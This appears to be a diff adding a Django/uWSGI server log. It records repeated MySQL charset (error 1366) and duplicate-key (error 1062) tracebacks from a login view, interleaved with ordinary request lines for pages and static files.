+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 671/868] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:29:06 2021] POST /login/ => generated 209959 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '111' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '111' for key 'uid'")
+[pid: 2069|app: 0|req: 672/869] 180.160.72.163 () {48 vars in 1137 bytes} [Thu Jan 14 08:29:08 2021] POST /login/ => generated 208322 bytes in 107 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 673/870] 114.87.230.234 () {40 vars in 1010 bytes} [Thu Jan 14 08:29:09 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/871] 114.87.230.234 () {42 vars in 1038 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/872] 114.87.230.234 () {42 vars in 1016 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/873] 114.87.230.234 () {42 vars in 1020 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/874] 114.87.230.234 () {42 vars in 1018 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/875] 114.87.230.234 () {42 vars in 1024 bytes} [Thu Jan 14 08:29:10 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/876] 114.87.230.234 () {42 vars in 999 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/877] 114.87.230.234 () {42 vars in 997 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/878] 114.87.230.234 () {42 vars in 1015 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/879] 114.87.230.234 () {42 vars in 1013 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/880] 114.87.230.234 () {42 vars in 1005 bytes} [Thu Jan 14 08:29:10 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/881] 114.87.230.234 () {42 vars in 1056 bytes} [Thu Jan 14 08:29:10 2021] GET /static/img/favicon.ico => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: 0|req: 674/882] 180.160.72.163 () {48 vars in 1115 bytes} [Thu Jan 14 08:29:19 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 675/883] 180.160.72.163 () {42 vars in 1100 bytes} [Thu Jan 14 08:29:19 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 676/884] 180.160.72.163 () {42 vars in 1102 bytes} [Thu Jan 14 08:29:19 2021] GET /home/ => generated 7487 bytes in 9 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 677/885] 180.160.72.163 () {48 vars in 1137 bytes} [Thu Jan 14 08:29:25 2021] POST /login/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 678/886] 180.160.72.163 () {42 vars in 1116 bytes} [Thu Jan 14 08:29:26 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 679/887] 180.160.72.163 () {42 vars in 1118 bytes} [Thu Jan 14 08:29:26 2021] GET /home/ => generated 7487 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 680/888] 180.160.72.163 () {40 vars in 1070 bytes} [Thu Jan 14 08:29:30 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 681/889] 180.160.72.163 () {48 vars in 1181 bytes} [Thu Jan 14 08:29:36 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 682/890] 180.160.72.163 () {42 vars in 1105 bytes} [Thu Jan 14 08:29:42 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 683/891] 180.160.72.163 () {42 vars in 1107 bytes} [Thu Jan 14 08:29:42 2021] GET /publish/ => generated 4577 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 684/892] 180.160.72.163 () {48 vars in 1181 bytes} [Thu Jan 14 08:29:47 2021] POST /login/ => generated 27 bytes in 26 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 685/893] 180.160.72.163 () {42 vars in 1118 bytes} [Thu Jan 14 08:29:47 2021] GET /home/ => generated 7490 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+Not Found: /
+[pid: 2069|app: 0|req: 686/894] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 08:29:58 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 687/895] 180.160.72.163 () {38 vars in 864 bytes} [Thu Jan 14 08:31:08 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/896] 180.160.72.163 () {40 vars in 847 bytes} [Thu Jan 14 08:31:08 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/897] 180.160.72.163 () {40 vars in 863 bytes} [Thu Jan 14 08:31:08 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 688/898] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:31:29 2021] POST /login/ => generated 209756 bytes in 142 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 689/899] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:31:36 2021] POST /login/ => generated 209756 bytes in 126 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
